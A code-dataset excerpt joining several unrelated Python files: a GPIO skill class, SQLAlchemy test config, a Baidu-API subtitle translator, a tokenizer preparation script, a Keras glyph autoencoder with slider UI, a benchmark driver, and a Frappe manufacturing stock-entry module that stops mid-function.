        T.trace(__name__, T.DEBUG, 'data: ' + data)
    ############################################################################
    # @brief    stopps the skill: release the GPIOs and restore the LED to
    #           the low state
    # @return   none
    ############################################################################
    def stop_skill(self):
        super().stop_skill()
        self._switch_gpio = None
        self._current_state = _SWITCH_STATE_LOW
        if self._led_gpio != None:
            if self._led_inf == False:
                self._led_gpio.value(self._current_state)
                T.trace(__name__, T.DEBUG, 'led state:' + str(self._current_state))
            else:
                self._led_gpio.value(_SWITCH_STATE_DICT_INV[self._current_state])
                T.trace(__name__, T.DEBUG, 'led state:' + str(_SWITCH_STATE_DICT_INV[self._current_state]))
        self._led_gpio = None
self._led_gpio = None
################################################################################
# Scripts
# Module-level trace configuration; this module has no standalone behavior.
T.configure(__name__, T.INFO)
if __name__ == "__main__":
    # execute only if run as a script
    T.trace(__name__, T.WARNING, 'no main script defined ')
| StarcoderdataPython |
3531879 | <reponame>aleph-oh/wikigame-solver
"""
This module contains constants for testing the database.
"""
from sqlalchemy import create_engine, event
from sqlalchemy.engine import Engine
from sqlalchemy.orm import sessionmaker
from ..utilities import set_sqlite_foreign_key_pragma
# Public names exported by this test-fixture module.
__all__ = ["TEST_DB_URL", "test_engine", "TestSession"]
# Throwaway on-disk SQLite database used by the test suite.
TEST_DB_URL = "sqlite:///./test.db"
test_engine = create_engine(TEST_DB_URL)
# Session factory bound to the test engine; autocommit/autoflush are off so
# tests control transaction boundaries explicitly.
TestSession = sessionmaker(autocommit=False, autoflush=False, bind=test_engine)
# Register the SQLite foreign-key pragma hook on every new connection
# (listens_for decorator applied as a plain call).
event.listens_for(Engine, "connect")(set_sqlite_foreign_key_pragma)
| StarcoderdataPython |
9703553 | # 翻译当前目录下所有srt文件,并在当前目录新建文件夹subtile_Translaed,保存所有翻译过的字幕文件,支持百度API和搜狗API
import http.client
import hashlib
import urllib
import random
import json
import time
import os
# Credentials for the Baidu translation API (placeholders — must be filled in).
appid = '***************' # fill in your appid
secretKey = '****************' # fill in your secret key
# QPS = 1 # fill in your QPS (queries per second quota)
# Collect all .srt files in the current directory.
srtFile = []
for i in range(len(os.listdir("."))):
    if (os.listdir(".")[i][-3:] == "srt"):
        srtFile.append(os.listdir(".")[i])
fileCount = len(srtFile)
for j in range(fileCount):
    # Read the subtitle file and extract the English sentences (every 4th
    # line, offset 2, per the standard SRT index/timestamp/text/blank layout)
    # into the subtitleContent list.
    with open(srtFile[j],encoding="utf-8") as file:
        srt = file.read()
    subtitle = srt.split("\n")
    subtitleContent = []
    for i in range(int(len(subtitle)/4)):
        subtitleContent.append(subtitle[2+i*4])
    ##############################################
    trsCount = len(subtitleContent)
    # Call the Baidu translation API for each extracted sentence.
    trsResult = []
    for i in range(trsCount):
        httpClient = None
        myurl = '/api/trans/vip/translate'
        fromLang = 'en' # source language
        toLang = 'zh' # target language
        salt = random.randint(32768, 65536)
        q= subtitleContent[i]
        # Request signature: MD5(appid + query + salt + secretKey).
        sign = appid + q + str(salt) + secretKey
        sign = hashlib.md5(sign.encode()).hexdigest()
        myurl = myurl + '?appid=' + appid + '&q=' + urllib.parse.quote(q) + '&from=' + fromLang + '&to=' + toLang + '&salt=' + str(
            salt) + '&sign=' + sign
        # Retry loop until a well-formed response (3 keys) is received.
        # NOTE(review): if the very first connection attempt raises before
        # json.loads assigns `result`, the except/finally branches reference
        # an unbound (or stale, from a previous sentence) `result` — this
        # can raise NameError or exit the loop prematurely; confirm and fix.
        while True:
            try:
                httpClient = http.client.HTTPConnection('api.fanyi.<EMAIL>')
                httpClient.request('GET', myurl)
                # response is an HTTPResponse object
                response = httpClient.getresponse()
                result_all = response.read().decode("utf-8")
                result = json.loads(result_all)
                # print(q)
                # print (result["trans_result"][0]["dst"].replace("搅拌机","Blender"))
                if (len(result)==3):
                    trsResult.append(result["trans_result"][0]["dst"].replace("搅拌机","Blender"))
                    break
            except Exception as e:
                if (len(result)==3):
                    break
                print (e)
            finally:
                if (len(result)==3):
                    break
                if httpClient:
                    httpClient.close()
                # Throttle to respect the API's QPS limit.
                time.sleep(0.1)
        tipStr = "正在翻译第" + str(j+1) + "/" + str(fileCount+1) + "个文件的第" + str(i+1) + "/" + str(trsCount + 1) + "句话"
        # NOTE(review): "cls" makes this progress display Windows-only.
        os.system("cls")
        print(tipStr)
    ###########################################################
    # Reassemble the translation results and save as a new SRT file, with
    # each translated line inserted directly after its English source line.
    finalResult = ""
    for i in range(len(subtitle)):
        if(subtitle[i] == ""):
            finalResult += "\n\n"
        else:
            finalResult += subtitle[i] + "\n"
            if (i - 2)%4 == 0:
                finalResult += trsResult[int((i - 2)/4)]
    # for i in range(len(subtitleContent)):
    #     print(subtitleContent[i])
    #     print(trsResult[i])
    # NOTE(review): output folder name "subtile_Translaed" is misspelled but
    # is a runtime path — changing it would change where files are written.
    if not os.path.exists(".\subtile_Translaed"):
        os.makedirs(".\subtile_Translaed")
    with open(".\subtile_Translaed\\" + srtFile[j],"w",encoding="utf-8") as f:
        f.write(finalResult)
    # Redundant: both handles were opened via `with` and are already closed.
    file.close()
    f.close()
##########################################
| StarcoderdataPython |
# Tuples are immutable: to "change" one, rebind the name to a new tuple.
dimensions = (200, 50)
width, height = dimensions
print(width)
print(height)
for size in dimensions:
    print(size)
print("Original dimensions:")
for size in dimensions:
    print(size)
# Rebinding the name; the original tuple object itself is never modified.
dimensions = (400, 1000)
print("\nModified dimensions:")
for size in dimensions:
    print(size)
12861467 | <reponame>wietsedv/gpt2-recycle<filename>src/preparation/2_prepare_0_tokens.py
from argparse import ArgumentParser
from pathlib import Path
import pickle
import os
from tqdm import tqdm
from tokenizers import Tokenizer
from tokenizers.processors import RobertaProcessing
from transformers import AutoTokenizer
def init_tokenizer(lang, n, m):
    """Build a tokenizer: a HuggingFace one when a model id *m* is given,
    otherwise the language-specific vocabulary of size *n* (in thousands)
    with Roberta-style <s>/<\\/s> post-processing. Exactly one of n/m must
    be set; otherwise the process exits with status 1.
    """
    if n is None and m is None:
        print('size nor model are specified, but one of them is required')
        exit(1)
    if m is not None:
        tokenizer = AutoTokenizer.from_pretrained(m, use_fast=True)
        return tokenizer
    # Load the locally trained tokenizer, e.g. data/<lang>/.../<lang>-040k.tokenizer.json
    tokenizer = Tokenizer.from_file(
        str(
            Path('data') / lang / 'preparation' / 'vocabularies' /
            f'{lang}-{str(n).zfill(3)}k.tokenizer.json'))
    # Wrap each encoding as <s> ... </s> without shifting character offsets.
    tokenizer.post_processor = RobertaProcessing(
        ('</s>', tokenizer.token_to_id('</s>')),
        ('<s>', tokenizer.token_to_id('<s>')),
        trim_offsets=True)
    return tokenizer
def tokenize_doc(tokenizer: Tokenizer, doc):
    """Encode *doc* and return its token ids as a plain list.

    Handles both HuggingFace tokenizers (whose encode() returns a bare list
    of ids) and `tokenizers.Tokenizer` (whose encode() returns an Encoding
    carrying an `.ids` attribute).
    """
    encoded = tokenizer.encode(doc)
    return encoded if type(encoded) == list else encoded.ids
def tokenize_file(tokenizer, src_path, eot=None):
    """Tokenize a plaintext file into per-document lists of token ids.

    Documents are separated by blank lines when *eot* is None, otherwise by
    lines consisting solely of the *eot* marker. Asymmetry kept from the
    original behavior: eot-delimited documents are stripped before encoding,
    blank-line-delimited ones (and any trailing document) are not.
    """
    separator = '\n' if eot is None else eot + '\n'
    docs = []
    buffer = ''
    with open(src_path) as handle:
        for line in tqdm(handle):
            if line == separator:
                text = buffer if eot is None else buffer.strip()
                docs.append(tokenize_doc(tokenizer, text))
                buffer = ''
            else:
                buffer += line
    # Flush the final document if the file did not end with a separator.
    if buffer != '':
        docs.append(tokenize_doc(tokenizer, buffer))
    return docs
def main():
    """CLI: tokenize all plaintext files for a language and pickle the ids.

    Writes data[-NNNk].pkl with every example; train/valid/test files
    additionally get their own data-<subset>[-NNNk].pkl dumps.
    """
    parser = ArgumentParser()
    parser.add_argument('lang')
    parser.add_argument('--size',
                        type=int,
                        default=None,
                        help='vocab size (in thousands)')
    parser.add_argument('--model',
                        default=None,
                        help='HuggingFace model identifier')
    parser.add_argument('--eot', default=None)
    args = parser.parse_args()
    prep_dir = Path('data') / args.lang / 'preparation' / 'prepared'
    # Size-less runs (HF model) write plain data.pkl; sized runs data-NNNk.pkl.
    dst_path = prep_dir / ('data.pkl' if args.size is None else
                           f'data-{str(args.size).zfill(3)}k.pkl')
    if not dst_path.parent.exists():
        os.makedirs(dst_path.parent)
    print(f' > preparing {dst_path}')
    tokenizer = init_tokenizer(args.lang, args.size, args.model)
    examples = []
    src_paths = sorted((Path('data') / args.lang / 'preparation' /
                        'plaintext').glob('**/*.txt'))
    for src_path in src_paths:
        print('🔥', src_path)
        new_examples = tokenize_file(tokenizer, src_path, eot=args.eot)
        # Known subset files also get a dedicated per-subset dump.
        if src_path.name in ['train.txt', 'valid.txt', 'test.txt']:
            subset = src_path.name.split('.')[0]
            out_path = dst_path.parent / dst_path.name.replace(
                'data', f'data-{subset}')
            print(f' > exporting {len(new_examples):,} examples to {out_path}')
            with open(out_path, 'wb') as f:
                pickle.dump(new_examples, f)
        examples.extend(new_examples)
        print(f' ::: {len(examples):,} examples loaded')
    print(f'{len(examples):,} examples')
    print(f' > exporting {dst_path}')
    with open(dst_path, 'wb') as f:
        pickle.dump(examples, f)
if __name__ == '__main__':
main()
| StarcoderdataPython |
9710240 | <reponame>QuillMcGee/CharacterAutoencoder
import time
import numpy as np
import pylab
from keras.layers import Input, Dense, Conv2D, MaxPooling2D, Reshape, Flatten, UpSampling2D
from keras.models import Model
from matplotlib.widgets import Slider, Button
from helperfunctions import process, genvec
# ---- Autoencoder definition: 96x96 grayscale glyphs -> 16-dim latent ----
batch_size = 32
sidelen = 96
original_shape = (batch_size, 1, sidelen, sidelen)
latent_dim = 16
intermediate_dim = 256
# Encoder: conv stack -> flatten -> dense -> 16-dim latent code.
x = Input(batch_shape=original_shape)
a = Conv2D(128, (5, 5), padding='same', activation='relu')(x)
b = MaxPooling2D(pool_size=(4, 4))(a)
c = Conv2D(128, (3,3), padding='same', activation='relu')(b)
d = Conv2D(16, (3,3), padding='same', activation='relu')(c)
d_reshaped = Flatten()(d)
h = Dense(intermediate_dim, activation='relu')(d_reshaped)
z_mean = Dense(latent_dim)(h)
# we instantiate these layers separately so as to reuse them later
# (the same decoder layers are re-wired below to build a standalone generator)
decoder_h = Dense(intermediate_dim, activation='relu')
i = Dense(8 * 24 * 24, activation='relu')
j = Reshape((8, 24, 24))
k = Conv2D(128, (3,3), padding='same', activation='relu')
l = UpSampling2D((4, 4))
m = Conv2D(128, (3,3), padding='same', activation='relu')
n = Conv2D(128, (3,3), padding='same', activation='relu')
decoder_mean = Conv2D(1, (3,3), padding='same', activation='sigmoid')
# Decoder wired onto the encoder output to form the full autoencoder.
h_decoded = decoder_h(z_mean)
i_decoded = i(h_decoded)
j_decoded = j(i_decoded)
k_decoded = k(j_decoded)
l_decoded = l(k_decoded)
m_decoded = m(l_decoded)
n_decoded = n(m_decoded)
x_decoded_mean = decoder_mean(n_decoded)
vae = Model(x, x_decoded_mean)
vae.compile(optimizer='rmsprop', loss="binary_crossentropy")
# ---- Load training data (machine-specific paths) and pre-trained weights ----
computer = "desktop"
if computer == "laptop":
    x_train = np.load("/home/exa/Documents/PythonData/images_all_processed.npy")
elif computer == "desktop":
    x_train = np.load("D:\\conlangstuff\\images_all_processed.npy")
x_train = x_train.reshape((x_train.shape[0], 1, sidelen, sidelen))
vae.load_weights("omniglot_16_1.sav")
# build a model to project inputs on the latent space
encoder = Model(x, z_mean)
print(encoder.output_shape)
# build a digit generator that can sample from the learned distribution
# (reuses the shared decoder layers with a fresh 16-dim input)
decoder_input = Input(shape=(latent_dim,))
_h_decoded = decoder_h(decoder_input)
_i_decoded = i(_h_decoded)
_j_decoded = j(_i_decoded)
_k_decoded = k(_j_decoded)
_l_decoded = l(_k_decoded)
_m_decoded = m(_l_decoded)
_n_decoded = n(_m_decoded)
_x_decoded_mean = decoder_mean(_n_decoded)
generator = Model(decoder_input, _x_decoded_mean)
# ---- Interactive UI: 16 sliders, one per latent dimension, with buttons ----
# NOTE(review): `type` and `l` shadow Python builtins; `axisbg` is a
# long-deprecated matplotlib keyword (now `facecolor`) — confirm the pinned
# matplotlib version before upgrading.
numpoints = 2
np.random.seed(int(time.time()))
type = "existing"
pylab.figure(num=1, figsize=(10,10))
ax = pylab.subplot(111)
pylab.subplots_adjust(left=0.3, bottom=0.4)
# Placeholder 600x600 image; updated whenever a slider moves.
l = ax.imshow(np.array([[1]+[0]*599]*600, dtype='int64'), cmap="Greys", animated=True)
#pylab.axis([0, 1, -10, 10])
lower = -20
upper = 20
axcolor = 'lightgoldenrodyellow'
axes = []
sliders = []
for x in range(16):
    axes.append(pylab.axes([0.15, x*.025, 0.75, 0.01], axisbg=axcolor))
for x in range(16):
    sliders.append(Slider(axes[x], str(x), lower, upper, valinit=0))
def update(val):
    # Decode the current 16-dim slider vector and redraw the glyph image.
    values = [sliders[x].val for x in range(16)]
    data = process(generator.predict((np.array(values)).reshape((1,16))).reshape(96,96), 600, 600)
    l.set_data(data)
    pylab.draw()
[sliders[x].on_changed(update) for x in range(16)]
resetax = pylab.axes([0, 0.025, 0.1, 0.04])
resetb = Button(resetax, 'Random', color=axcolor, hovercolor='0.975')
def reset(event):
    # Sample a fresh latent vector (via genvec) and push it into the sliders.
    val = genvec(type=type, x_train=x_train, encoder=encoder)
    print(val)
    for x in range(16):
        print(val[0][x])
        sliders[x].set_val(val[0][x])
resetb.on_clicked(reset)
savax = pylab.axes([0, 0.2, 0.1, 0.04])
savb = Button(savax, 'Save', color=axcolor, hovercolor='0.975')
def save(event):
    # Print the current latent vector rounded to 3 decimals ("save" = copy
    # from the console; slider values may be scalars or 1-element arrays).
    values = []
    for x in range(16):
        try:
            values.append(float("{0:.3f}".format(sliders[x].val[0])))
        except:
            values.append(float("{0:.3f}".format(sliders[x].val)))
    print(values)
    print()
savb.on_clicked(save)
loadax = pylab.axes([0, 0.1, 0.1, 0.04])
loadb = Button(loadax, 'Load', color=axcolor, hovercolor='0.975')
def load(event):
    # Parse a "[v0, v1, ...]" vector typed at the console into the sliders.
    values = input("Enter character vector:")
    values = values[1:-1]
    values = values.replace(" ", "")
    values = values.split(",")
    values = [float(x) for x in values]
    for x in range(16):
        sliders[x].set_val(values[x])
loadb.on_clicked(load)
pylab.show()
# Various figures for omniglot_16_1
#arabic numeral 4: [-15.33, -100, -40.33, -16, 52.33, 43.67, -60.67, 98.67, -28.33, 48.33, 91, 45.33, 64.33, -14, 66.33, -100]
#also a 4: [7.667, -100.0, -39.0, -9.0, 15.667, 54.667, -53.333, 95.0, -64.333, 55.0, 80.333, 61.333, 84.333, -55.667, 75.333, -49.333]
#distance between latent vectors may not be a good similarity metric
# u and a sideways J above it [-5.433, -10.0, 7.933, 8.367, 3.767, -1.733, -3.867, -3.267, -1.8, -9.733, -3.7, -5.433, -10.0, 2.067, 5.033, -1.433]
# circle with lines coming off top and bottom [-5.433, 5.2, 7.933, 8.367, 3.767, -1.733, -3.867, -3.267, -1.8, -9.733, -3.7, -5.433, -10.0, 2.067, 5.033, -1.433]
# perpendicularity symbol with hat [-5.6, -8.167, 6.467, -10.0, -10.0, 0.3, 3.833, 2.133, 0.833, 1.567, 4.667, -7.233, -10.0, -10.0, -10.0, 3.2]
# bowl with line over it [3.567, 4.733, -4.133, -1.533, -10.0, -10.0, 10.0, -0.733, -10.0, -3.9, -0.4, -10.0, 4.733, -5.633, -2.733, 1.1]
# ladder on its side: [3.033, 7.433, 2.033, 7.367, 5.6, -4.6, 10.0, 10.0, -9.567, -4.033, 4.9, -4.367, 1.2, 10.0, 2.4, 10.0]
# plus sign, but the left and bottom forming a loop and the right bent 90 degrees upward [-1.667, -10.6, -20.0, -13.867, 6.8, -6.533, -5.933, -20.0, -20.0, 20.0, 20.0, 15.533, -20.0, -20.0, -4.333, 3.0]
# T crossed with mirrored J, but with a really sharp angle on the mirrored J [-20.0, 4.933, 7.933, 2.8, 3.533, -20.0, 20.0, 15.733, -20.0, 20.0, 6.2, -3.333, 5.533, -5.267, -6.267, 0.733]
# tall vertical line with smaller vertical lines on both sides [6.4, 16.6, -4.267, -0.533, 8.667, 3.0, -1.067, -0.267, -0.4, -1.2, -6.467, 0.667, -11.467, -5.267, -4.4, -4.333]
# the left edge of nevada with a little curly bit coming off the shallow angle [1.733, 20.0, 10.133, 13.933, -11.0, -14.6, -13.667, 6.867, -4.2, -2.867, 8.933, 14.4, 3.533, 11.067, -16.6, -7.867]
# lowish aspect ratio rectangle with line pointing upward coming off left upper corner [18.8, 4.067, -2.6, 6.667, -15.667, 17.8, 4.667, -16.067, -2.867, 7.467, 15.267, 7.933, 5.6, -4.667, 3.2, 16.867]
# vertical line with line coming off to right and sharply bending down on top and short line coming off to right on bottom [1.0, 20.0, 20.0, -20.0, -11.867, 20.0, -3.733, -20.0, -8.0, -20.0, 20.0, -20.0, -1.333, -12.067, 2.4, -20.0]
# I [10.0, -5.4, -2.867, -6.133, -16.2, -10.067, 6.933, 1.067, -14.6, -1.267, -2.333, -16.933, 10.133, -20.0, -20.0, -1.133]
# weird thing (W with a Y as the middle?) [20.0, 8.933, -8.8, 15.067, -20.0, 5.133, -3.2, -5.8, -20.0, 8.8, 20.0, 14.8, 9.4, 20.0, -6.733, 13.933]
# perpendicularity symbol [7.533, -20.0, 9.333, 14.467, 4.467, -7.067, 0.067, -20.0, 4.733, -3.067, 7.933, -12.333, 2.333, -4.133, -20.0, 20.0]
# sorta a W but with left bent things on the left two and a short right one [-0.592, -4.437, -1.53, 3.726, 1.723, -5.548, -7.522, -13.294, -19.16, -2.086, 12.332, 8.667, -18.933, 11.0, -13.267, 20.0]
# a thing [14.027, 13.222, -12.16, -11.198, 9.491, 19.545, 9.137, 6.489, -15.164, 1.695, -6.774, 6.257, 0.994, -3.902, -20.0, -6.467]
# capital letter H [-0.467, 1.8, -2.133, -0.667, 2.2, 4.533, 2.467, 4.533, -6.4, -0.667, 1.0, -0.2, 0.6, -1.6, -1.267, -0.4]
| StarcoderdataPython |
1743397 | <filename>experiments/perf_exp_2_das.py
from datetime import datetime
import socket
import os
import csv
import logging
import time
import sys
from experiment import Experiment
from system import DasSystem
import perf_exp_2
def main(order_on_write, read_heavy):
    """Run performance experiment 2 on the DAS cluster.

    The first hostname in $HOSTS acts as the experiment driver; every other
    host only starts its DasSystem node and returns.  Results are written to
    a timestamped CSV under ./results/.

    Args:
        order_on_write: forwarded to DasSystem; enables write ordering.
        read_heavy: if True run a 2:1 read/write mix, otherwise 1:2.
    """
    logging.basicConfig(format='%(asctime)s.%(msecs)03d - %(levelname)-8s: %(message)s',
                        level=logging.WARNING,datefmt='%d-%m-%y %H:%M:%S')
    hostnames = os.getenv('HOSTS').split()
    hostname = socket.gethostname()
    system = DasSystem(num_clients=10, port=25000, order_on_write=order_on_write)
    if hostname != hostnames[0]:
        # Non-driver hosts only run a system node.
        system.start()
        return
    # Give the other nodes time to come up before driving the workload.
    time.sleep(15)
    read_factor = 2 if read_heavy else 1
    write_factor = 1 if read_heavy else 2
    experiment = Experiment(
        experiment_name='Performance Experiment 2',
        systems=[system],
        n_writes=100000 * write_factor,
        n_reads=100000 * read_factor,
    )
    # Run experiment 5 times
    print("{}".format(experiment.__str__()))
    start = time.perf_counter()
    exp_func = perf_exp_2.read_heave_exp_func if read_heavy else perf_exp_2.write_heavy_exp_func
    results = list(experiment.run_multi_client(exp_func, repeat=1))[0]
    columns = ["system_name", "run_id", "latency", "operation", "on_leader", "n_nodes", "n_clients", "order_on_write"]
    filename = "./results/experiment2_{}_{}_{}.csv".format(order_on_write, read_heavy, datetime.today().strftime("%Y%m%d%H%M%S"))
    with open(filename, 'w', encoding="utf-8") as f:
        writer = csv.writer(f)
        writer.writerow(columns)
        writer.writerows(results)
    end = time.perf_counter()
    print('Time: ', end-start)


if __name__ == '__main__':
    # CLI flags: argv[1] -> order_on_write, argv[2] -> read_heavy ("1" = on).
    order_on_write = len(sys.argv) > 1 and int(sys.argv[1]) == 1
    read_heavy = len(sys.argv) > 2 and int(sys.argv[2]) == 1
    main(order_on_write, read_heavy)
| StarcoderdataPython |
8082269 | <gh_stars>0
# -*- coding: utf-8 -*-
# Copyright (c) 2020, Frappe and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
import json
class PchManufacturingRecord(Document):
    """Controller for the Pch Manufacturing Record DocType (no custom logic)."""
    pass
@frappe.whitelist()
def get_start_end_process_raw_materials(start_process, end_process, method):
    """Return raw-material rows for every process step between start and end.

    The original special-cased start_process == end_process, but both
    branches made the identical helper call (passing the same name twice is
    equivalent to the start==end case), so they collapse into one call.
    """
    return get_pro_order_wise_manufacture_method_details_raw_items(
        start_process, end_process, method)
@frappe.whitelist()
def get_start_end_process_raw_materials_for_packing(start_process, end_process, method, item_made_list):
    """Return raw-material rows for the packing (start) process.

    BUG FIX: get_pro_order_wise_manufacture_method_details_raw_items takes
    exactly three arguments; the original also passed ``item_made_list`` and
    therefore raised TypeError on every call.  ``end_process`` and
    ``item_made_list`` stay in the signature for backward compatibility with
    existing client-side callers but are unused.
    """
    return get_pro_order_wise_manufacture_method_details_raw_items(
        start_process, start_process, method)
# product_order_wise_data_end
@frappe.whitelist()
def get_start_end_p_process_details(start_process, end_process, method):
    """Return process-detail rows for every step between start and end.

    The original special-cased start_process == end_process, but both
    branches made the identical helper call, so they collapse into one.
    """
    return get_pro_order_wise_process_details(start_process, end_process, method)
def get_pro_order_wise_process_details(start_process, end_process, method):
    # Resolve both step names to their numeric process_order, then return
    # every step of `method` whose order lies in [start, end], ascending.
    start_process_pro_ord_no = frappe.db.get_value("Pch Manufacturing Method Details", {"name": start_process},
                                                   "process_order")
    end_process_pro_ord_no = frappe.db.get_value("Pch Manufacturing Method Details", {"name": end_process},
                                                 "process_order")
    mmd_process_details = frappe.db.sql("""select
        mmd.name,mmd.pch_process,mmd.pch_method,mmd.process_order,mmd.turnaround_time,mmd.touch_points
        from
        `tabPch Manufacturing Method Details` mmd
        where
        mmd.process_order>=%s and mmd.process_order<= %s and mmd.pch_method= %s order by mmd.process_order asc""",
        (start_process_pro_ord_no, end_process_pro_ord_no, method), as_dict=1)
    return mmd_process_details
def get_pro_order_wise_manufacture_method_details_raw_items(start_process, end_process, method):
    # Resolve both step names to numeric process_order values, then return the
    # raw-material (RM Child) rows of every step of `method` in [start, end].
    start_process_pro_ord_no = frappe.db.get_value("Pch Manufacturing Method Details", {"name": start_process},
                                                   "process_order")
    end_process_pro_ord_no = frappe.db.get_value("Pch Manufacturing Method Details", {"name": end_process},
                                                 "process_order")
    manufacture_method_details_raw_items = frappe.db.sql("""select
        mmd.name,mmd.pch_process,mmdi.item_code,mmdi.item_name,mmdi.qty_uom,mmdi.qty_per_unit_made,mmdi.consumption_type,mmdi.stock_uom,mmdi.conversion_factor,mmdi.operand,mmdi.qty_in_stock_uom
        from`tabPch Manufacturing Method Details` mmd,`tabPch Manufacturing Method Details RM Child` mmdi where
        mmd.name=mmdi.parent and process_order>=%s and process_order<= %s and pch_method= %s """,
        (start_process_pro_ord_no, end_process_pro_ord_no, method),
        as_dict=1)
    return manufacture_method_details_raw_items
#for packing
@frappe.whitelist()
def get_packing_raw_materials(multiple_method_items, start_process, end_process):
    """Return raw-material rows for the given packed items between two steps.

    Args:
        multiple_method_items: JSON list of {"item_made": ..., "units_s_r": ...}.
        start_process / end_process: Pch Manufacturing Method Details names
            bounding the process_order range (inclusive).

    SECURITY FIX: the original interpolated the client-supplied item codes
    directly into the SQL string (this is a whitelisted endpoint); all values
    are now bound as query parameters.  Also guards the empty-item case,
    which previously produced invalid "in ()" SQL.
    """
    multiple_method_items = json.loads(multiple_method_items)
    start_order = frappe.db.get_value(
        "Pch Manufacturing Method Details", {"name": start_process}, "process_order")
    end_order = frappe.db.get_value(
        "Pch Manufacturing Method Details", {"name": end_process}, "process_order")
    # De-duplicate item codes while preserving first-seen order (the original
    # built a dict keyed on item_made, which has the same effect).
    item_made_codes = list(dict.fromkeys(
        row.get("item_made") for row in multiple_method_items))
    if not item_made_codes:
        return []
    placeholders = ", ".join(["%s"] * len(item_made_codes))
    query = """select
        mmd.name, mmd.pch_process, mmd.item_code as item_made,
        mmdi.item_code, mmdi.item_name, mmdi.qty_uom, mmdi.qty_per_unit_made,
        mmdi.consumption_type, mmdi.stock_uom, mmdi.conversion_factor,
        mmdi.operand, mmdi.qty_in_stock_uom
        from `tabPch Manufacturing Method Details` mmd,
             `tabPch Manufacturing Method Details RM Child` mmdi
        where mmd.name = mmdi.parent
          and mmd.process_order >= %s and mmd.process_order <= %s
          and mmd.item_code in ({0})""".format(placeholders)
    values = [start_order, end_order] + item_made_codes
    return frappe.db.sql(query, tuple(values), as_dict=1)
@frappe.whitelist()
def get_child_doc_data(doc_type, parent):
    """Return all child rows of `doc_type` belonging to `parent`.

    SECURITY FIX: `parent` (client-supplied on this whitelisted endpoint) is
    now passed as a bound query parameter instead of being concatenated into
    the SQL string.  The table name cannot be a bound parameter, so
    `doc_type` is validated against the DocType registry first
    (frappe.get_meta raises for unknown doctypes).
    """
    frappe.get_meta(doc_type)  # reject arbitrary table names
    doc_data = frappe.db.sql(
        "select * from `tab{0}` where parent=%s".format(doc_type),
        (parent,), as_dict=1)
    return doc_data
@frappe.whitelist()
def get_wh_ac_to_location(location_name, wh_type, process):
    """Return the warehouse configured for a process at a location.

    `wh_type` selects the column to return ("outbound_warehouse" or
    "inbound_warehouse"); returns None when the location has no row for
    that process.
    """
    rows = frappe.db.sql(
        """select outbound_warehouse,inbound_warehouse from `tabPch Locations Child` where parent = %s and process_name = %s """,
        (location_name, process), as_dict=1)
    if not rows:
        return None
    return rows[0][wh_type]
# Ak
@frappe.whitelist()
def validate_start_and_end_process(start_process, end_process):
    """Return 1 when start_process does not come after end_process, else 0."""
    start_order = frappe.db.sql(
        """select `process_order` as `start_process_order` from `tabPch Manufacturing Method Details` where name=%s""",
        (start_process), as_dict=1)[0]["start_process_order"]
    end_order = frappe.db.sql(
        """select `process_order` as `end_process_order` from `tabPch Manufacturing Method Details` where name=%s""",
        (end_process), as_dict=1)[0]["end_process_order"]
    return 0 if start_order > end_order else 1
# raw_material_transactions_start
# pch_locations_id,items
# issue from raw material wh of location
@frappe.whitelist()
def send_material_for_manufacturing(entity):
    """Issue raw materials and move made items for a manufacturing step.

    `entity` is a JSON string (whitelisted endpoint) describing the location,
    the start process, the required raw items (req_items) and the made items
    (method_items).  Creates up to three submitted Stock Entries:

      1. Material Issue of the raw items from the location's raw-material
         warehouse (always).
      2. Material Receipt of the made items into the outbound warehouse --
         only when the start process is the first one (process_order == 1).
      3. Material Transfer outbound -> target warehouse, carrying the issue's
         outgoing value (plus labour) as additional cost (always).

    Any failure cancels the entries created earlier in this call.  Returns a
    list of {"Name", "Status", "Stock Entry Type"} dicts.
    """
    entity = json.loads(entity)
    item_payload_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")},
                                               "item_payload_account")
    units = entity.get("units_to_be_sr");
    location = entity.get("location");
    company = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "company");
    raw_material_warehouse = frappe.db.get_value("Pch Locations", {"name": entity.get("location")},
                                                 "raw_material_warehouse")
    start_process_pro_ord_no = frappe.db.get_value("Pch Manufacturing Method Details",
                                                   {"name": entity.get("start_process")}, "process_order")
    # issue_start: build the Material Issue rows from the required raw items.
    issue_items_list = []
    for i_row in entity.get("req_items"):
        item_dic = {
            "item_code": i_row.get("item_code"),
            # making a change here "qty":i_row.get("total_qty") was the code before this
            "qty": i_row.get("dispatched_quantity_in_uom"),
            "uom": i_row.get("qty_uom"),
            "conversion_factor": i_row.get("conversion_factor"),
            "t_wh": None,
            "s_wh": raw_material_warehouse,
            "item_payload_account": item_payload_account
        }
        issue_items_list.append(item_dic)
    se_issue_entity = {"action": "Material Issue", "items_list": issue_items_list, "company": company}
    # print "se_issue_entity",se_issue_entity
    se_issue = create_stock_entry(se_issue_entity)
    # issue_end
    response = [];
    if se_issue[0]["Exception"] == "Not Occured":
        # issue is done #call_next_transaction #material_rec
        # Response JSON to validate Stock Entry Creation
        response.append({"Name": se_issue[0]["Name"], "Status": "Created", "Stock Entry Type": "Material Issue"});
        # transfer is must
        trans_entity = {
            "items": entity.get("method_items"),
            "s_wh": entity.get("outbound_warehouse"),
            "t_wh": entity.get("target_warehouse"),
            "units_to_be_sr": entity.get("units_to_be_sr"),
            "company": company
        }
        labour_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "labour_account")
        trans_entity["labour_account"] = labour_account
        trans_entity["isAdditionCost"] = 1
        # Carry the issue's outgoing value into the transfer as additional cost.
        trans_entity["add_amount"] = frappe.db.get_value("Stock Entry", {"name": se_issue[0]["Name"]},
                                                         "total_outgoing_value")
        trans_entity["item_payload_account"] = item_payload_account
        # transfer is must
        start_process_pro_ord_no = int(start_process_pro_ord_no)
        if start_process_pro_ord_no == 1:
            # First process: made items do not exist in stock yet, so receipt
            # them into the outbound warehouse before transferring.
            # print "se_issue created 3t:",se_issue
            # receipt fetch method item #Pch Manufacturing Record Child Method (method_items)
            receipt_items_list = []
            for i_row in entity.get("method_items"):
                val = i_row.get("qty_made")
                actual_qty = units * val;
                item_dic = {
                    "item_code": i_row.get("item_made"),
                    "qty": actual_qty,
                    "uom": i_row.get("qty_uom"),
                    "conversion_factor": i_row.get("conversion_factor"),
                    "t_wh": entity.get("outbound_warehouse"),
                    "s_wh": None,
                    "item_payload_account": item_payload_account
                }
                receipt_items_list.append(item_dic)
            se_rec_entity = {"action": "Material Receipt", "items_list": receipt_items_list, "company": company}
            # print "se_rec_entity data",se_rec_entity
            se_receipt = create_stock_entry(se_rec_entity)
